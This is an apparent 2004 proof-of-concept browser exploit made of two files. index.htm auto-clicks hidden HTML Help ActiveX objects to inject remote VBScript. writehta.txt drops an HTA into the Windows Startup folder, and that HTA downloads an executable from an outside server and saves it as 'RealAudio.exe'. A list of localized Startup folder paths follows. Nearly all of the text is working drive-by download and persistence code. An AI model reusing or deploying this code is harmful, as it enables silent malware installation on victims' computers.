// index.htm //
<div style="display:none">
<OBJECT id="localpage"
type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194"
width="7%">
<PARAM name="Command" value="Related Topics,
MENU">
<PARAM name="Button" value="Text:Just a
button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;file://C:\WINDOWS\
PCHealth\HelpCtr\System\blurbs\tools.htm">
</OBJECT>
<OBJECT id="inject" type="application/x-oleobject"
classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" height=7%
style="position:absolute;top:140;left:72;z-index:100;"
codebase="hhctrl.ocx#Version=5,2,3790,1194"
width="7%">
<PARAM name="Command" value="Related Topics,
MENU">
<PARAM name="Button" value="Text:Just a
button">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript
("document.write(\"<script
language=\\\"vbscript\\\" src=\\\"
http://server/writehta.txt\\\"\"+String.fromCharCode(62)+\"
</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
</div>
<script>
localpage.HHClick();
setTimeout("inject.HHClick()",100);
</script>
// writehta.txt //
on error resume next
set evanchik = CreateObject("ADODB.Recordset")
With evanchik
.Fields.Append "evanchik", 200, "3000"
Call .Open
Call .AddNew
.Fields("evanchik").Value = "meaning less shit i had to put
here"
Call .AddNew
.Fields("evanchik").Value = "<script
language=vbscript>: on error
resume next : set o = CreateObject(""msxml2.XMLHTTP"")
: o.open
""GET"",""http://server/calc.exe"",False
: o.send : set s = createobject
(""adodb.stream"") : s.type=1 : s.open : s.write
o.responseBody :
s.savetofile ""
C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\RealAudio.exe"",2 :
</script>"
Call .Update
End With
evanchik.Save "
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Microsoft
Office.hta",
adPersistXML
// Spanish \Documents and Settings\All Users\Menu
Inicio\Programas\Inicio\
// French \Documents and Settings\All Users\Menu
Démarrer\Programmes\Démarrage
// Danish \Documents and Settings\All Users\Menuen
Start\Programmer\Start\
// Dutch \Documents and Settings\All Users\Menu
Start\Programma's\Opstarten\
// Polish \Documents and Settings\All Users\Menu
Start\Programy\Autostart\
// Italian \Documents and Settings\All Users\Menu
Avvio\Programmi\Esecuzione automatica\
// Finn \Documents and Settings\All
Users\Kaynnista-valikko\Ohjelmat\Kaynnistys\
// Turkish \Documents and Settings\All Users\Start
Menu\Programlar\BASLANGIC\ Turkish
// Norwegian \Documents and Settings\All
Users\Start-meny\Programmer\Oppstart\
// Swedish \Documents and Settings\All
Users\Start-menyn\Program\Autostart\
// Portuguese \Documents and Settings\All Users\Menu
Iniciar\Programas\Iniciar\
// German \Dokumente und Einstellungen\All
Users\Startmenu\Programme\Autostart\
evanchik.Close
securitydot.net - 2004-12-25
|
